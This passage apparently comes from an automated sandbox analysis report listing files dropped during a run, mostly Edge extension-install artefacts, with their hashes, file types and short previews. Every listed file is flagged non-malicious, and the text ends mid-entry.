                                                                                                                                                                                                                                                                                                                  Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\cv_debug.log

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1420
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.3886031940472
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:YJxF5sQ5szAW01Rp5yK10YO5qv70VhQu5Fa0YiN55ip70YFRcHv5M:YJxF5sQ5sEW01X5y60YO5qD0VH5Fa0TI
                                                                                                                                                                                                                                                                                                                  MD5:D941AF31220784A09C1B37DC55429B13
                                                                                                                                                                                                                                                                                                                  SHA1:C1593666C63F072E93559CBC78C16AF81402951F
                                                                                                                                                                                                                                                                                                                  SHA-256:BBFEFC00DD8E5E55201A67E69133651081E6321E17AF69103A99FB56F4C7EDA3
                                                                                                                                                                                                                                                                                                                  SHA-512:EDDB43C94810060A8025B36CCA843746302C4C116243C2C204BB06B7AE128EA1C574E3DA12A8EC4A938783EA088294C998398D42B22F5770722565BEBE91DD7A
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"logTime": "1005/081724", "correlationVector":"2/PmMr7SOFFRIqTwW+HesJ","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/081729", "correlationVector":"mBsci4p0IuAlecFQAh3IDU","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/081729", "correlationVector":"EFCCE5F7ECC74238A0D17C500D8EB81C","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/083130", "correlationVector":"jkXXrPbML/1ucIa5c7okZ6","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/083130", "correlationVector":"CECEB17551BE48CCBF3DD12E07118D84","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/083241", "correlationVector":"WUtA7xoJfeUJPFSRRtPAng","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/083242", "correlationVector":"B7F67C44DD3147F7BE748158D3F8E7B5","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/083444", "correlationVector":"6kKZpL8SvSsrBcj/Fl+tva","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/083445", "correlationVector":"94D95442

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\delays.tmp

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1048575
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:1f/:F
                                                                                                                                                                                                                                                                                                                  MD5:52EEA21AFDC1FA07894225ED9536D245
                                                                                                                                                                                                                                                                                                                  SHA1:9F0EDB171DBF05A67ADEDA2C3FF1768D5066F9BE
                                                                                                                                                                                                                                                                                                                  SHA-256:3A36D5B3161D3A27AE6D1390D5D959786DADF6860882022745B1F73190D04E9C
                                                                                                                                                                                                                                                                                                                  SHA-512:EC45901B1BCB35F2B166C519EE6F7C072D46C13D94327415AC316E16DDB552C1CBCA807827132F0167D121ED762CB6364AC19BCCC2699A6D033A3B57929E7A69
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:8888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\e475f2c9-1b89-448b-b445-7c2264b16d5a.tmp

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):31335
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.694019108205432
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:768:514ugFV0910SWyR5kNVdS3sNp/xm3MbiMuYEDlyFUyv6E/ty8:5WcDWyRKNVd2M/IxMuYEDlymsTQ8
                                                                                                                                                                                                                                                                                                                  MD5:6B72597205C77D3E40E1A35BEE403801
                                                                                                                                                                                                                                                                                                                  SHA1:6BECEE055C6E057AF9475B6D651B4EE561D02F20
                                                                                                                                                                                                                                                                                                                  SHA-256:C899297FBDFC88C1634B1145A087FDB5BE17172FD786C078B299557B22F06DEB
                                                                                                                                                                                                                                                                                                                  SHA-512:7CB1A98E0C7FBB349D9CB681233A9F4ED22A1C3FAADCDF1BC270B04BD97D3FC41AB6F762B2F5F231281D63D96AC3D243640BA81D5E8CCD9F54486B4F538CA8B4
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:......Exif..II*.................Ducky.......2......Adobe.d...........................................................#"""#''''''''''..................................................!! !!''''''''''........V.."....................................................................................!1..AQ..aq."2....R..T....Br.#S.U..b..3Cs...t6.c.$D.5uV...4d.E&....%F......................!1..AQaq....."2......BRbr3CS....#..4.............?......1f.n..T......TP....E...........P.....@.........E..@......E.P........@........E.....P.P..A@@.E..@.P.P..AP.P..AP..@....T..AP.E..P.Z .. ....."... .....7.H...w.....t.....T....M.."... P..n.n..t5..*B.P..*(.................*.....................( ..................*.. .".... .".......(.. .".....*.. ....o......E.6... ..*..."........."J......Ah......@.@@....:@{6..wCp..3...((.(......................*...@..(...."....................*......*.. ........T.......@.@@........AP.P..@.E@....E@.d.E@.@@..@.P.T..@..@..P.D...@M........EO..."...=.wCp.....R......P.@......

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_584404894\CRX_INSTALL\_metadata\verified_contents.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1753
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.8889033066924155
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                                                                                                                                                                                                                                                  MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                                                                                                                                                                                                                                                  SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                                                                                                                                                                                                                                                  SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                                                                                                                                                                                                                                                  SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "eyJpdGVtX2lkIjoiam1qZmxnanBjcGVwZWFmbW1nZHBma29na2doY3BpaGEiLCJpdGVtX3ZlcnNpb24iOiIxLjIuMSIsInByb3RvY29sX3ZlcnNpb24iOjEsImNvbnRlbnRfaGFzaGVzIjpbeyJmb3JtYXQiOiJ0cmVlaGFzaCIsImRpZ2VzdCI6InNoYTI1NiIsImJsb2NrX3NpemUiOjQwOTYsImhhc2hfYmxvY2tfc2l6ZSI6NDA5NiwiZmlsZXMiOlt7InBhdGgiOiJjb250ZW50LmpzIiwicm9vdF9oYXNoIjoiQS13R1JtV0VpM1lybmxQNktneUdrVWJ5Q0FoTG9JZnRRZGtHUnBEcnp1QSJ9LHsicGF0aCI6ImNvbnRlbnRfbmV3LmpzIiwicm9vdF9oYXNoIjoiVU00WVRBMHc5NFlqSHVzVVJaVTFlU2FBSjFXVENKcHhHQUtXMGxhcDIzUSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJKNXYwVTkwRmN0ejBveWJMZmZuNm5TbHFLU0h2bHF2YkdWYW9FeWFOZU1zIn1dfV19",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_584404894\CRX_INSTALL\content.js

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):9815
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.1716321262973315
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                                                                                                                                                                                                                                                                                                  MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                                                                                                                                                                                                                                                                                  SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                                                                                                                                                                                                                                                                                  SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                                                                                                                                                                                                                                                                                                  SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_584404894\CRX_INSTALL\content_new.js

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):10388
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.174387413738973
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                                                                                                                                                                                                                                                  MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                                                                                                                                                                                                                                                  SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                                                                                                                                                                                                                                                                                  SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                                                                                                                                                                                                                                                  SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_584404894\CRX_INSTALL\manifest.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):962
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.698567446030411
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                                                                                                                                                                                                                                                  MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                                                                                                                                                                                                                                                                                                  SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                                                                                                                                                                                                                                                  SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                                                                                                                                                                                                                                                                                  SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_584404894\c8eca8f8-af66-4438-bdca-65ccc494d0a2.tmp

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):11185
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                                                  MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                                                  SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                                                  SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                                                  SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\9ca71cd0-7423-4e94-9276-77d189273c12.tmp

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):138356
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.809609231921042
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:AQ++ZdS5+fnwcxO+XwquyeNnmraugZ/1DOoncWD/5q:AQ++/PZmlyeNnh/1SmRq
                                                                                                                                                                                                                                                                                                                  MD5:3F6F93C3DCCD4A91C4EB25C7F6FEB1C1
                                                                                                                                                                                                                                                                                                                  SHA1:9B73F46ADFA1F4464929B408407E73D4535C6827
                                                                                                                                                                                                                                                                                                                  SHA-256:19F05352CB4C6E231C1C000B6C8B7E9EDCC1E8082CAF46FFF16B239D32AA7C9E
                                                                                                                                                                                                                                                                                                                  SHA-512:D488FA67E3A29D0147E9EAF2EABC74D9A255F8470CF79A4AEA60E3B3B5E48A3FCBC4FC3E9CE58DFF8D7D0CAA8AE749295F221E1FE1BA5D20DEB2D97544A12BA4
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........q.a.....E..i.t,..7C..7!...`l.-.......T.vH...~.....'..aH..C.oJOE..d..2..$J......I..;.(9l.(..+.N.6.@...].a.n.S.6..=.b.W.\....o...#.~J.W.1..E...2H....S.g0....../.H...y.O8...kE.,..m!..F.D.p......H..s.W ...#.L........Ij.........-..n..\..vD.d.V.....!......[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...F0D. ?Eq.M...[6^...+.].G..Y]...7..o.. U...v....P.J...@.E!...B.d..p..i".%............oo.<....~=..!t.+...`....h..LK....0....h...,.R%.....u...._..V_.q:_._..5}.uS\.....x?...~]..C-....S=L...._c.P.B....-M...62.i*.Q.....9.....+S=...../6:...W..ql/g..&j.y..{.."....|..F....|....V....w.%t.y..?..&..a..<.n....S+|..=.ra.....

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\128.png

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):4982
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.929761711048726
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                                                                                                                                                                                                  MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                                                                                                                                                                                                  SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                                                                                                                                                                                                  SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                                                                                                                                                                                                  SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\af\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):908
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.512512697156616
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                                                                                                                                                                                                  MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                                                                                                                                                                                                  SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                                                                                                                                                                                                                                                  SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                                                                                                                                                                                                                                                  SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\am\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1285
